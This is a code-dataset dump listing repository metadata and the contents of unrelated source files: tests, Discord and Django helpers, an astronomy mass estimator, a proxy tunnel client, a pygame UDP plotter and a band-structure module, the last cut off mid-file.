max_stars_repo_path
stringlengths
3
269
max_stars_repo_name
stringlengths
4
119
max_stars_count
int64
0
191k
id
stringlengths
1
7
content
stringlengths
6
1.05M
score
float64
0.23
5.13
int_score
int64
0
5
tests/test_generator.py
thombashi/elasticsearch-faker
1
12789651
import json import sys from textwrap import dedent import pytest from faker import Factory, Faker from elasticsearch_faker._generator import FakeDocGenerator from elasticsearch_faker._provider import re_provider class TestFakeDocGenerator: @pytest.mark.skipif(sys.version_info < (3, 6), reason="requires python3.6 or higher") def test_normal_generate_docs(self): fake = Factory.create() Faker.seed(0) template_text = dedent( """\ { "name": "{{ name }}", "address": "{{ address }}" } """ ) providers = re_provider.findall(template_text) generator = FakeDocGenerator( template=template_text, providers=providers, index_name="test_index", fake=fake, ) output = generator.generate_docs(bulk_size=2, worker_id=0) print(json.dumps(output, indent=4)) assert output == [ { "index": { "_index": "test_index", "_id": "e3e70682-c209-4cac-a29f-6fbed82c07cd-0", }, }, { "name": "<NAME>", "address": "5938 Juan Throughway Apt. 948 West Corey, TX 43780", }, { "index": { "_index": "test_index", "_id": "5a921187-19c7-4df4-8f4f-f31e78de5857-0", } }, { "name": "<NAME>", "address": "Unit 7784 Box 0801 DPO AP 52775", }, ] output = generator.generate_docs(bulk_size=2, worker_id=0) print(json.dumps(output, indent=4)) assert output == [ { "index": { "_index": "test_index", "_id": "ab0c1681-c8f8-43d0-9329-0a4cb5d32b16-0", } }, { "name": "<NAME>", "address": "139 John Divide Suite 115 Rodriguezside, VT 16860", }, { "index": { "_index": "test_index", "_id": "ec188efb-d080-466e-952f-233a8c25166a-0", } }, { "name": "<NAME>", "address": "96593 White View Apt. 094 Jonesberg, FL 05565", }, ]
2.1875
2
server/edd/load/exceptions/parse.py
trussworks/edd
13
12789652
<filename>server/edd/load/exceptions/parse.py from django.utils.translation import gettext_lazy as _ from .core import EDDImportError, EDDImportWarning class ParseError(EDDImportError): pass class ParseWarning(EDDImportWarning): pass class BadParserError(ParseError): def __init__(self, **kwargs): super().__init__( category=_("Internal error"), summary=_("Parser error"), **kwargs ) class UnsupportedMimeTypeError(ParseError): def __init__(self, **kwargs): super().__init__( category=_("Invalid file"), summary=_("Unsupported mime type"), **kwargs ) class IgnoredWorksheetWarning(ParseWarning): def __init__(self, **kwargs): super().__init__( category=_("Ignored data"), summary=_("Worksheets ignored"), **kwargs ) class RequiredColumnError(ParseError): def __init__(self, **kwargs): super().__init__( category=_("Invalid file"), summary=_("Missing required columns"), resolution=kwargs.pop( "resolution", _( "Fix formatting in your file, or go back and choose the correct format" ), ), **kwargs, ) class DuplicateColumnError(ParseError): def __init__(self, **kwargs): super().__init__( category=_("Invalid file"), summary=_("Duplicate column headers"), **kwargs ) class IgnoredColumnWarning(ParseWarning): def __init__(self, **kwargs): super().__init__( category=_("Ignored data"), summary=_("Ignored columns"), **kwargs ) class IgnoredValueWarning(ParseWarning): def __init__(self, **kwargs): super().__init__( category=_("Ignored data"), summary=_("Ignored values before recognized headers"), **kwargs, ) class UnsupportedUnitsError(ParseError): def __init__(self, **kwargs): super().__init__( category=_("Invalid file"), summary=_("Unsupported units"), **kwargs ) class RequiredValueError(ParseError): def __init__(self, **kwargs): super().__init__( category=_("Invalid file"), summary=_("Required values missing"), **kwargs ) class InvalidValueError(ParseError): def __init__(self, **kwargs): super().__init__( category=_("Invalid file"), summary=_("Invalid value"), **kwargs )
2.171875
2
pycordia/events.py
classPythonAddike/pycordia
23
12789653
import typing from datetime import datetime from .models import Member, User, Message from . import utils class ReadyEvent: """ Event called when the client is ready. Attributes: gateway_version (int): The version used for the WebSockets gateway user (User): The bot using the gateway guilds (typing.List[int]): A list of guild IDs the bot is in session_id (str): The session ID for the WebSockets session shard (tuple): The number of shards and their ID for this session partial_application (dict): An Application object with an ID and flags """ def __init__(self, data: dict): self.gateway_version: int = data["v"] self.user: User = User(data["user"]) self.guilds: typing.List[int] = [int(guild["id"]) for guild in data ["guilds"]] self.session_id: str = data["session_id"] # NOTE: unimplemented self.shard: tuple = data.get("shard", ()) self.partial_application: dict = data["application"] class MessageDeleteEvent: """Event called when message(s) deleted individually or in bulk Attributes: message_ids: The IDs of the message channel_id: The ID of the channel guild_id: The ID of the guild bulk: Whether the deletion was performed in bulk cached_message: The message, if it was cached by Pycordia """ def __init__(self, data: dict, bulk: bool, messages): if bulk: self.message_ids = data["ids"] else: self.message_ids = [data["id"]] self.cached_messages: typing.List[Message] = messages self.channel_id = data["channel_id"] self.guild_id = data.get("guild_id") self.bulk = bulk class TypingStartEvent: """Event called when an user starts typing a message Attributes: timestamp: The timestamp for the message as a datetime object member: The member that started typing user_id: The ID of the member channel_id: The ID of the channel where event was registered guild_id: The ID of the guild where event was registered """ def __init__(self, data: dict): self.timestamp = datetime.fromtimestamp(data["timestamp"]) self.member = utils.make_optional(Member, data.get("member")) self.user_id = data["user_id"] self.channel_id = data["channel_id"] self.guild_id = data["guild_id"]
2.453125
2
ticker/widgets.py
jezdez/django-ticker
1
12789654
<gh_stars>1-10 from django.utils.safestring import mark_safe from django import forms class ForeignKeyAsTextWidget(forms.HiddenInput): def __init__(self, append_text, *args, **kwargs): self.append_text = append_text super(ForeignKeyAsTextWidget, self).__init__() def render(self, *args, **kwargs): field_value = super(ForeignKeyAsTextWidget, self).render(*args, **kwargs) return mark_safe("%s <strong>%s</strong>" % (field_value, self.append_text))
2.1875
2
eres/events/GpioEvent.py
Tharnas/rc-eres-speaker
0
12789655
from .Event import Event class GpioEvent(Event): def __init__(self, origin, message): super().__init__('Gpio') self.origin = origin self.message = message def __str__(self): return self.origin + ': ' + self.message @property def origin(self): return self._origin @origin.setter def origin(self, origin): if not isinstance(origin, str): raise TypeError('origin must be a string') self._origin = origin @property def message(self): return self._message @message.setter def message(self, message): if not isinstance(message, str): raise TypeError('message must be a string') self._message = message
2.875
3
webdriver_manager/__init__.py
fictitiouswizard/webdriver_manager
0
12789656
__version__ = '3.4.1' from .chrome import ChromeDriverManager from .firefox import GeckoDriverManager from .microsoft import EdgeChromiumDriverManager, IEDriverManager from .opera import OperaDriverManager
1.1875
1
FoF/analysis/mass_estimator.py
kennethcheo/FoF
1
12789657
<reponame>kennethcheo/FoF<gh_stars>1-10 #!/usr/bin/env python3 import itertools import numpy as np import matplotlib.pyplot as plt from astropy import units as u import astropy.constants as const from astropy.coordinates import SkyCoord from astropy.cosmology import LambdaCDM from astropy.stats import bootstrap from astropy.utils import NumpyRNGContext from analysis.methods import redshift_to_velocity cosmo = LambdaCDM(H0=70 * u.km / u.Mpc / u.s, Om0=0.3, Ode0=0.7) # define cosmology # calculate velocity dispersion for an array of velocities def velocity_dispersion(v_arr, group_size): return np.sum(v_arr ** 2) / (group_size - 1) # evaluate projected virial radius def projected_radius(group_size, separation): return group_size * (group_size - 1) / separation # evaluate cluster mass def cluster_mass(cluster_vel_disp, projected_radius): mass = (3 / 2) * np.pi * (cluster_vel_disp * projected_radius) / const.G return mass.to(u.M_sun / u.littleh) def virial_mass_estimator(cluster): """ Calculates virial masses of galaxy clusters with the virial mass formula Parameters ---------- cluster: Cluster object Returns ------- mass: float Mass of cluster in M_sun cluster_vel_disp: float Estimated velocity dispersion of cluster in (km/s)**2 cluster_radius: float Estimated radius of cluster in Mpc """ member_galaxies = cluster.galaxies # velocity dispersion cluster_size = len(member_galaxies) z_arr = member_galaxies[:, 2] average_redshift = np.mean(z_arr) cluster_vel = redshift_to_velocity(z_arr, average_redshift) cluster_vel_err = velocity_error(cluster, z_arr, average_redshift, cluster_vel) cluster_vel_disp = velocity_dispersion(cluster_vel, cluster_size) bootfunc = lambda x: (velocity_dispersion(x, len(x))) bootstrap_disp = np.std(bootstrapping(cluster_vel.value, bootfunc)) harmonic_disp = (1 / cluster_size) * (sum(1 / (cluster_vel_err ** 2))) ** (-1) combined_disp_err = (np.sqrt(harmonic_disp.value ** 2 + (bootstrap_disp) ** 2)) * ( u.km ** 2 / u.s ** 2 ) # galaxy separations c = SkyCoord( ra=member_galaxies[:, 0] * u.degree, dec=member_galaxies[:, 1] * u.degree ) # array of coordinates pairs_idx = np.asarray( list((i, j) for ((i, _), (j, _)) in itertools.combinations(enumerate(c), 2)) ) # index of galaxies in combinations photoz_pairs = np.take( z_arr, pairs_idx ) # photoz values of galaxies from the indices d_A = cosmo.angular_diameter_distance( z=average_redshift ) # angular diameter distance pairs = c[pairs_idx] projected_sep = pairs[:, 0].separation(pairs[:, 1]) # projected separation (in deg) actual_sep = (projected_sep * d_A).to( u.Mpc, u.dimensionless_angles() ) # convert projected separation to Mpc actual_sep = ((actual_sep * ((cosmo.H0 / 100).value)) / u.littleh).to( u.Mpc / u.littleh ) # include littleh scaling total_separation = sum(1 / actual_sep) cluster_radius = projected_radius(cluster_size, total_separation) mass = cluster_mass(cluster_vel_disp, cluster_radius) mass_err = mass_error(mass, cluster_vel_disp, combined_disp_err) return ( mass, mass_err, cluster_vel_disp, combined_disp_err, cluster_radius, ) # M_sun/littleh, km^2/s^2, Mpc/littleh def projected_mass_estimator(cluster): member_galaxies = cluster.galaxies N = len(member_galaxies) z_arr = member_galaxies[:, 2] average_redshift = np.mean(z_arr) cluster_vel = redshift_to_velocity(z_arr, average_redshift) # in km/s c = SkyCoord( ra=member_galaxies[:, 0] * u.degree, dec=member_galaxies[:, 1] * u.degree ) centroid = SkyCoord( ra=np.mean(member_galaxies[:, 0]) * u.degree, dec=np.mean(member_galaxies[:, 1]) * u.degree, ) # center = SkyCoord(ra=cluster_center[:,0]*u.degree, dec=cluster_center[:,1]*u.degree) cluster_separation = centroid.separation(c) d_A = cosmo.angular_diameter_distance(z=average_redshift) actual_separation = (cluster_separation * d_A).to(u.Mpc, u.dimensionless_angles()) actual_separation = (actual_separation * ((cosmo.H0 / 100).value) / u.littleh).to( u.Mpc / u.littleh ) # include littleh scaling sumproduct = np.sum(actual_separation * cluster_vel ** 2) projected_mass = (32 / np.pi) * (1 / const.G) * (1 / (N - 1.5)) * sumproduct vel_err = velocity_error(cluster, z_arr, average_redshift, cluster_vel) mass_err = np.sqrt(sum((2 * cluster_vel * vel_err) ** 2)) return projected_mass.to(u.M_sun / u.littleh), mass_err def velocity_error(cluster, z_arr, z_average, velocities): galaxies = cluster.galaxies galaxies_z_err = abs( galaxies[:, 3:5] - z_arr[:, np.newaxis] ) # upper and lower error # take the maximum error range galaxies_z_err = np.amax(galaxies_z_err, axis=1) # calculate numerator and denominator errors z_average_err = np.sqrt(sum(galaxies_z_err ** 2)) / len( z_arr ) # standard error of mean z_diff_err = np.sqrt(np.add(z_average_err ** 2, galaxies_z_err ** 2)) # combined error of velocities err = abs(velocities) * np.sqrt( (z_average_err / z_average) ** 2 + ((z_diff_err) / (z_arr - z_average)) ** 2 ) return err def mass_error(mass, vel_disp, vel_disp_err): return mass * (vel_disp_err / vel_disp) def log_error(error, quantity): return 0.434 * (error / quantity) def bootstrapping(bootarr, bootfunc): # gives multiple velocity dispersion with NumpyRNGContext(1): bootresult = bootstrap( bootarr, bootnum=100, samples=len(bootarr) - 1, bootfunc=bootfunc ) return bootresult
2.59375
3
popgen/utils/__init__.py
linzwatt/PopGen
58
12789658
from .sigmoid_annealing import sigmoid_annealing
1.117188
1
src/briefcase/platforms/macOS/__init__.py
probonopd/briefcase
0
12789659
<gh_stars>0 DEFAULT_OUTPUT_FORMAT = 'dmg' class macOSMixin: platform = 'macOS' def verify_tools(self): pass
1.351563
1
problems/knapsack/params/buildEssenceParams.py
conjure-cp/EssenceCatalog
6
12789660
<gh_stars>1-10 #!/usr/bin/env python3 import sys def assertStartsWith(prefix,line): if not line.startswith(prefix): print("Error: Expected line to start with " + prefix + ".\nLine: " + line, file=sys.stderr) sys.exit(1) def readValue(prefix, file): line = file.readline() assertStartsWith(prefix,line) return int(line.split(" ")[1].strip()) def handleInstance(name, file): numberItems = readValue("n ", file) capacity = readValue("c ", file) optimum = readValue("z ", file) assertStartsWith("time ", file.readline()) weights = [] profits = [] for line in file: if line.startswith("---"): break prefix = str(len(weights) + 1) + "," assertStartsWith(prefix,line) csv = line.split(",") profits.append(int(csv[1])) weights.append(int(csv[2])) filename = name + ".param" print("Writing file:", filename) with open(filename, "w") as out: print("$instance size is ", numberItems,file=out) print("letting capacity be ", capacity, file=out) print("letting items be new type enum { ", file=out) print(",".join(["a" + str(i) for i in range(1,len(weights) + 1)]), file=out) print("}", file=out) print("letting weight be function (", file=out) print(",".join(['a'+str(i + 1) + " --> " + str(w) for (i,w) in enumerate(weights)]), file=out) print(")", file=out) print("letting gain be function (", file=out) print(",".join(['a'+str(i + 1) + " --> " + str(p) for (i,p) in enumerate(profits)]), file=out) print(")", file=out) def main(file): for line in file: if line.startswith("knapPI_"): handleInstance(line.strip(), file) if __name__ == "__main__": with open(sys.argv[1]) as file: main(file)
3.265625
3
gui/viz_pygame.py
clinfo/DeepKF
5
12789661
# coding: utf-8 # import numpy as np import json from socket import * import select import pygame from pygame.locals import * import sys HOST = gethostname() PORT = 1113 BUFSIZE = 1024 ADDR = ("127.0.0.1", PORT) USER = 'Server' INTERVAL=0.01 VEROCITY=100 LIFETIME=1000 #Window.fullscreen=True class DataReceiver: def init(self): self.label_data={} self.t={} self.udpServSock = socket(AF_INET, SOCK_DGRAM) #IPv4/UDP self.udpServSock.bind(ADDR) self.udpServSock.setblocking(0) enabled_labels = [0,1,2] labels = {"0":"aaa","1":"bbb","2":"ccc"} def update(self): data=None draw_data={} try: while True: data, addr = self.udpServSock.recvfrom(BUFSIZE) if data is not None and len(data)>0: print('...received from and returned to:', addr) print(len(data)) while len(data)>=6: idx=int.from_bytes(data[0:1],byteorder='little') l=int.from_bytes(data[1:2],byteorder='little') arr=np.frombuffer(data[2:6],dtype=np.float32) data=data[6:] y=arr[0] draw_data[l]=y print(idx,l,y) except: pass if len(draw_data)>0: for l,y in draw_data.items(): # set label color label=int(l) if label not in self.label_data: self.label_data[label]=np.zeros((100,)) self.label_data[label][:]=np.nan self.t[label]=0 self.label_data[label][self.t[l]]=y for l,v in self.label_data.items(): self.t[l]+=1 self.t[l]=self.t[l]%100 self.label_data[l][self.t[l]]=np.nan def stop(self): self.udpServSock.close() color_list=[(255,0,0),(0,255,0),(0,0,255),] def main(): dr=DataReceiver() pygame.init() # 初期化 screen = pygame.display.set_mode((600, 400)) pygame.display.set_caption("Pygame Test") dr.init() t=0 dt=10 while(True): cnt=0 for event in pygame.event.get(): # 終了処理 if event.type == QUIT: pygame.quit() sys.exit() dr.update() screen.fill((0,0,0,)) # 背景色の指定。RGBだと思う for k,v in dr.label_data.items(): cur=dr.t[k] prev=np.nan for i in range(len(v)): y=v[(cur-i)%len(v)] #if (not np.isnan(y)) and (not np.isnan(prev)): # pygame.draw.line(screen, (255,255,255), (i*dt,prev), ((i+1)*dt,y),5) if (not np.isnan(y)): pygame.draw.circle(screen, color_list[k], (i*dt,int(y)), 3) cnt+=1 prev=y pygame.display.update() # 画面更新 pygame.time.wait(30) # 更新間隔。多分ミリ秒 t+=1 if __name__ == "__main__": main()
2.703125
3
ls/lslocal.py
nanqinlang/lightsocks-minami
15
12789662
import argparse import asyncio import sys sys.path.append("..") from module.password import InvalidPasswordError, loadsPassword from utils import net from core.local import LsLocal from utils import config as lsConfig def run_server(config: lsConfig.Config): loop = asyncio.get_event_loop() listenAddr = net.Address(config.localAddr, config.localPort) remoteAddr = net.Address(config.serverAddr, config.serverPort) server = LsLocal( loop=loop, password=<PASSWORD>, listenAddr=listenAddr, remoteAddr=remoteAddr) def didListen(address): print('Listen to %s:%d\n' % address) asyncio.ensure_future(server.listen(didListen)) loop.run_forever() def main(): parser = argparse.ArgumentParser(description='A light tunnel proxy that helps you bypass firewalls') parser.add_argument( '--version', action='store_true', default=False, help='show version information') proxy_options = parser.add_argument_group('Proxy options') proxy_options.add_argument( '--save', metavar='CONFIG', help='path to dump config') proxy_options.add_argument( '-c', metavar='CONFIG', help='path to config file') proxy_options.add_argument( '-u', metavar='URL', help='url contains server address, port and password') proxy_options.add_argument( '-s', metavar='SERVER_ADDR', help='server address') proxy_options.add_argument( '-p', metavar='SERVER_PORT', type=int, help='server port, default: 443') proxy_options.add_argument( '-b', metavar='LOCAL_ADDR', help='local binding address, default: 127.0.0.1') proxy_options.add_argument( '-l', metavar='LOCAL_PORT', type=int, help='local port, default: 1082') proxy_options.add_argument('-k', metavar='PASSWORD', help='password') args = parser.parse_args() if args.version: print('lightsocks - modified by @nanqinlang') sys.exit(0) config = lsConfig.Config(None, None, None, None, None) if args.c: try: with open(args.c, encoding='utf-8') as f: file_config = lsConfig.load(f) except lsConfig.InvalidFileError: parser.print_usage() print(f'invalid config file {args.c!r}') sys.exit(1) except FileNotFoundError: parser.print_usage() print(f'config file {args.c!r} not found') sys.exit(1) config = config._replace(**file_config._asdict()) if args.u: try: url_config = lsConfig.loadURL(args.u) except lsConfig.InvalidURLError: parser.print_usage() print(f'invalid config URL {args.u!r}') sys.exit(1) config = config._replace(**url_config._asdict()) if args.s: serverAddr = args.s # TODO: 验证 serverAddr 有效性 config = config._replace(serverAddr=serverAddr) if args.p: serverPort = args.p # TODO: 验证 serverPort 有效性 config = config._replace(serverPort=serverPort) if args.b: localAddr = args.b # TODO: 验证 localPort 有效性 config = config._replace(localAddr=localAddr) if args.l: localPort = args.l # TODO: 验证 localPort 有效性 config = config._replace(localPort=localPort) if args.k: try: password = loadsPassword(args.k) config = config._replace(password=password) except InvalidPasswordError: parser.print_usage() print('invalid password') sys.exit(1) if config.localAddr is None: config = config._replace(localAddr='127.0.0.1') if config.localPort is None: config = config._replace(localPort=1082) if config.serverPort is None: config = config._replace(serverPort=443) if config.password is None: parser.print_usage() print('need PASSWORD, please use [-k PASSWORD]') sys.exit(1) if config.serverAddr is None: parser.print_usage() print('need SERVER_ADDR, please use [-s SERVER_ADDR]') if args.save: print(f'dump config file into {args.save!r}') with open(args.save, 'w', encoding='utf-8') as f: lsConfig.dump(f, config) run_server(config) if __name__ == '__main__': main()
2.265625
2
casino/utils.py
Nerf-Bot/NerfCogs
0
12789663
<reponame>Nerf-Bot/NerfCogs import re import math from typing import Union, Dict, List, Sequence utf8_re = re.compile(r"^[\U00000000-\U0010FFFF]*$") min_int, max_int = 1 - (2 ** 64), (2 ** 64) - 1 def is_input_unsupported(data: Union[Dict, List, str, int, float]): if type(data) is dict: for k, v in data.items(): if is_input_unsupported(k) or is_input_unsupported(v): return True if type(data) is list: for i in data: if is_input_unsupported(i): return True if type(data) is str and not utf8_re.match(data): return True if type(data) is int: if not (min_int <= data <= max_int): return True if type(data) is float: if math.isnan(data) or math.isinf(data): return True if not (min_int <= data <= max_int): return True class PluralDict(dict): """This class is used to plural strings You can plural strings based on the value input when using this class as a dictionary. """ def __missing__(self, key): if "(" in key and key.endswith(")"): key, rest = key.split("(", 1) value = super().__getitem__(key) suffix = rest.rstrip(")").split(",") if len(suffix) == 1: suffix.insert(0, "") return suffix[0] if value <= 1 else suffix[1] raise KeyError(key) def time_converter(units): return sum(int(x) * 60 ** i for i, x in enumerate(reversed(units.split(":")))) def color_lookup(color="grey"): colors = { "blue": 0x3366FF, "red": 0xFF0000, "green": 0x00CC33, "orange": 0xFF6600, "purple": 0xA220BD, "yellow": 0xFFFF00, "teal": 0x009999, "magenta": 0xBA2586, "turquoise": 0x00FFFF, "grey": 0x666666, "pink": 0xFE01D1, "white": 0xFFFFFF, } color = colors[color] return color def fmt_join(words: Sequence, ending: str = "or"): if not words: return "" elif len(words) == 1: return words[0] else: return "{} {} {}".format(", ".join(map(str, words[:-1])), ending, words[-1]) def cooldown_formatter(seconds, custom_msg="0"): m, s = divmod(seconds, 60) h, m = divmod(m, 60) if h > 0: msg = "{0}h" if m > 0 and s > 0: msg += ", {1}m, and {2}s" elif s > 0 and m == 0: msg += " and {2}s" elif s == 0 and m == 0: pass else: msg += " and {1}m" elif h == 0 and m > 0: msg = "{1}m" if s == 0 else "{1}m and {2}s" elif m == 0 and h == 0 and s > 0: msg = "{2}s" else: msg = custom_msg return msg.format(h, m, s) def time_formatter(seconds): # Calculate the time and input into a dict to plural the strings later. m, s = divmod(seconds, 60) h, m = divmod(m, 60) data = PluralDict({"hour": h, "minute": m, "second": s}) # Determine the remaining time. if h > 0: fmt = "{hour} hour{hour(s)}" if data["minute"] > 0 and data["second"] > 0: fmt += ", {minute} minute{minute(s)}, and {second} second{second(s)}" if data["second"] > 0 == data["minute"]: fmt += ", and {second} second{second(s)}" msg = fmt.format_map(data) elif h == 0 and m > 0: if data["second"] == 0: fmt = "{minute} minute{minute(s)}" else: fmt = "{minute} minute{minute(s)}, and {second} second{second(s)}" msg = fmt.format_map(data) elif m == 0 and h == 0 and s > 0: fmt = "{second} second{second(s)}" msg = fmt.format_map(data) else: msg = "None" return msg
3.3125
3
generator.py
Amitdedhia6/DrugDiscovery
0
12789664
<filename>generator.py import torch from torch import nn from common import device, max_sequence_length, noise_vector_length, noise class Generator(torch.nn.Module): """ A generative neural network """ def __init__(self, vocab): super(Generator, self).__init__() self.vocab = vocab self.input_dim = noise_vector_length + vocab.character_embedding_size self.hidden_dim = 5 self.n_lstm_layers = 1 self.output_size = vocab.character_embedding_size self.hidden = None self.cell_state = None self.lstm = nn.LSTM(self.input_dim, self.hidden_dim, self.n_lstm_layers, batch_first=True).to(device) self.fc = nn.Linear(self.hidden_dim, self.output_size).to(device) self.tanh = nn.Tanh() def forward(self, batch_size): self.hidden = torch.zeros(self.n_lstm_layers, batch_size, self.hidden_dim).to(device) self.cell_state = torch.zeros(self.n_lstm_layers, batch_size, self.hidden_dim).to(device) y_list = [] start_elements = self.vocab.get_random_elements(batch_size) start_elements_tensors_list = [] for _j, element in enumerate(start_elements): start_elements_tensors_list.append(self.vocab.get_embedding(element)) x = torch.stack(start_elements_tensors_list, dim=0).to(device) y_list.append(x) length_data = torch.LongTensor([1] * batch_size) sequence_filled = torch.BoolTensor([False] * batch_size) noise_singal = noise(batch_size).to(device) x = torch.cat((x, noise_singal), dim=1).reshape(batch_size, 1, -1) length_sequence_processed = 1 while length_sequence_processed < max_sequence_length: lstm_out, (self.hidden, self.cell_state) = self.lstm(x, (self.hidden, self.cell_state)) lstm_out = lstm_out.contiguous().view(-1, self.hidden_dim) fc_out = self.fc(lstm_out) a1 = torch.pow(fc_out, 2) a2 = torch.sum(a1, dim=1) a3 = torch.sqrt(a2).unsqueeze(-1) y = fc_out / a3 y_list.append(y) length_sequence_processed += 1 is_end_of_seq = self.vocab.is_end_of_sequence(y) sequence_filled = sequence_filled + is_end_of_seq length_increment = (sequence_filled == False).type(torch.long) length_data = length_data + length_increment noise_singal = noise(batch_size).to(device) x = torch.cat((y, noise_singal), dim=1).reshape(batch_size, 1, -1) y_final = torch.stack(y_list, dim=1).to(device) l_final = length_data return y_final, l_final def get_sequences_from_tensor(self, t: torch.Tensor, length: torch.Tensor): return self.vocab.get_sequences_from_embeddings(t, length)
2.84375
3
src/t4me/bandstructure.py
knirajiitb/t4me_AMMCR
6
12789665
<filename>src/t4me/bandstructure.py # Copyright 2016 <NAME> # # This file is part of T4ME and covered by the BSD 3-clause license. # # You should have received a copy of the BSD 3-clause license # along with T4ME. If not, see <https://opensource.org/licenses/BSD-3-Clause/>. #!/usr/bin/python """Contains routines to set up the bandstructure.""" # pylint: disable=useless-import-alias, too-many-arguments, invalid-name, too-many-statements, no-name-in-module # pylint: disable=too-many-lines, assignment-from-no-return, unsubscriptable-object, unsupported-assignment-operation, c-extension-no-member import sys import logging import copy import numpy as np import scipy.interpolate import t4me.interface as interface import t4me.utils as utils import t4me.constants as constants from t4me.lattice import check_sensible_ksampling class Bandstructure(): # pylint: disable=too-many-instance-attributes, too-many-public-methods """ Handles the read in, generation and storrage of the bandstructure and its relevant parameters. Parameters ---------- lattice : object A `Lattice()` object. param : object A `Param()` object. filename : string, optional Filename and relative path for the input file that is to be read. Notes ----- The YAML general and bandstructure configuration (param.yml and bandparams.yml, respectively by default) files are read and the setup of the bandstructure is determined from these files. If an external band structure is supplied, i.e. from VASP (vasprun.xml is sufficient) the bandparams file is still needed as it contains parameters used to set up the scattering properties etc. at a later stage. Presently the following combination is possible: + Parametrized bands (parabolic, non-parabolic, Kane and a k^4 model) + VASP input from the VASP XML file (only this file is needed) + Numpy input files A combination of parametrized and tight binding bands is possible. If another code is to be used to provide the bandstructure parameters, please consult :mod:`interface` and use that as a base to write a new `bandstructure_yourcode` function in that module and include a call to this function in the initializer below. .. todo:: Add the posibility to add parameterized bands to the e.g. VASP bandstructure. Usefull for instance to investigate defects etc. that was not included in the calculation. .. todo:: Add interfaces to other first principle codes. """ def __init__(self, lattice, param, location=None, filename=None): # configure logger logger = logging.getLogger(sys._getframe().f_code.co_name) # pylint: disable=protected-access self.energies = None self.velocities = None self.dos = None self.dos_partial = None self.dos_energies = None self.lattice = lattice self.param = param self.occ = None self.cbm_band = None self.metallic = None self.bandparams = None self.tight_hop = None self.tight_orb = None self.tight_onsite = None self.tight_adj_onsite = None self.gen_velocities = False self.spin_degen = None self.status = None self.e0 = None self.effmass = None self.effmass_eigenval = None self.effmass_eigenvec = None self.effmass_tensor = None self.a = None self.ascale = None self.kshift = None self.scale = None if self.param.read == "param": interface.bandstructure_param(self, location=location, filename=filename) elif self.param.read == "vasp": interface.bandstructure_vasp(self, location=location, filename=filename) elif ((self.param.read == "numpy") or (self.param.read == "numpyv")): interface.bandstructure_numpy(self, location=location, filename=filename) else: logger.error( "The supplied read parameter in general configuration " "file is not recognized. Exiting.") sys.exit(1) # scissor operator? if self.param.scissor: self.apply_scissor_operator() # generate the velocities if they are not present # and if the user does not want to use the extraction # of the interpolation routines # makes more sense to have this in lbtecoeff.py or # similar, but sometimes one would want to check the # velocities and we thus need them before checking if # user wants to dump dispersion relation (imcludes velocities # if present). # also, if user wants to preinterpolate, wait with velocity # extraction if self.param.dispersion_velocities_numdiff: # special case for tight-binding extraction if not param.dispersion_interpolate or \ param.dispersion_interpolate_method == "tb": if not self.gen_velocities: logger.warning("The velocities already exist. " "This data will be overwritten. " "Continuing.") logger.info("Extracting the velocities by finite difference") self.calc_velocities() def locate_vbm(self, energies, occ): """ Locate the valence band maximum. Parameters ---------- energies : ndarray | Dimension: (N,M) The energy dispersion in eV for N bands at M k-points. occ : ndarray | Dimension: (N,M) The occupancy for N bands at M k-points. Returns ------- energy : float The valence band maximum in eV band : int The band index of the valence band maximum. kpoint : int The kpoint index of the valence band maximum. """ # set logger logger = logging.getLogger(sys._getframe().f_code.co_name) # pylint: disable=protected-access logger.debug("Running locate_vbm.") if energies is None: energies = self.energies if occ is None: occ = self.occ if occ is None: logger.error( "Occupancies are needed to calculate the valence band maximum. Exiting." ) sys.exit(1) # fetch the band index for the vbm numkpoints = energies[0].shape[0] # ceil in case of partly occupied band (although then things # start to get messy) vbm_band = int( np.ceil(occ[(abs(occ) > self.param.occ_cutoff)].shape[0] / numkpoints)) - 1 # fetch the kpoint for this band vbm_kpoint = np.argmax(energies[vbm_band]) # return energy, band and kpoint index for the vbm return energies[vbm_band, vbm_kpoint], vbm_band, vbm_kpoint def locate_cbm(self, energies, occ): """ Locate the conduction band minimum. Parameters ---------- energies : ndarray | Dimension: (N,M) The energy dispersion in eV for N bands at M k-points. occ : ndarray | Dimension: (N,M) The occupancy for N bands at M k-points. Returns ------- energy : float The conduction band minimum in eV. band : int The band index of the conduction band minimum. kpoint : int The kpoint index of the conduction band minimum. """ # set logger logger = logging.getLogger(sys._getframe().f_code.co_name) # pylint: disable=protected-access logger.debug("Running locate_cbm.") if energies is None: energies = self.energies if occ is None: occ = self.occ if occ is None: logger.error( "Occupancies are needed to calculate the valence band maximum. Exiting." ) sys.exit(1) # fetch the band index for the cbm numkpoints = energies[0].shape[0] # ceil in case of partly occupied band (although then things # start to get messy) cbm_band = occ.shape[0] - int( np.ceil( occ[(abs(occ) < self.param.occ_cutoff)].shape[0] / numkpoints)) # fetch the kpoint for this band cbm_kpoint = np.argmin(energies[cbm_band]) # return energy, band and kpoint index for the cbm return energies[cbm_band, cbm_kpoint], cbm_band, cbm_kpoint def locate_bandgap(self, energies=None, occ=None): """ Locate the band gap. Parameters ---------- energies : ndarray, optional | Dimension: (N,M) The energy dispersion in eV for N bands at M k-points. Defaults to the `energies` stored in the current `Bandstructure()` object. occ : ndarray, optional | Dimension: (N,M) The occupancy for N bands at M k-points. Defaults to the `occ` stored in the current `Bandstructure()` object. Returns ------- vbm_energy : float The valence band maximum in eV. bandgap : float The band gap in eV. """ # set logger logger = logging.getLogger(sys._getframe().f_code.co_name) # pylint: disable=protected-access logger.debug("Running locate_vbm_and_bandgap.") # fetch valence band maximum vbm_energy, _, vbm_kpoint = self.locate_vbm(energies=energies, occ=occ) # fetch conduction band minimum cbm_energy, _, cbm_kpoint = self.locate_cbm(energies=energies, occ=occ) # now we need to calculate the band gap band_gap = cbm_energy - vbm_energy # if band_gap is negative, we have either a semi-metal or metal, # so set band_gap to zero if band_gap < 0.0: band_gap = 0 direct = True if vbm_kpoint != cbm_kpoint: direct = False return band_gap, direct def apply_scissor_operator(self, energies=None): """ Apply scissor operator to blue or redshift the conduction band energies. Parameters ---------- energies : ndarray, optional | Dimension: (N,M) The energy dispersion for N bands at M k-points. Defaults to the `energies` stored in the current `Bandstructure()` object. Returns ------- None Notes ----- .. warning:: Please beware that this is a rather brutal (but usefull) operation. Make sure that the valence band maximum and conduction band minimum is fetched correctly. One way to check that this works is to plot the energies along a representative direction before and after the scissor operator have been executed. """ # set logger logger = logging.getLogger(sys._getframe().f_code.co_name) # pylint: disable=protected-access logger.debug("Running apply_scissor_operator.") if energies is None: energies = self.energies if self.cbm_band is None: logger.error("The conduction band index `cbm_band` was " "not found while trying to apply scissor " "operator. Are you sure the dataset you " "supplied contained 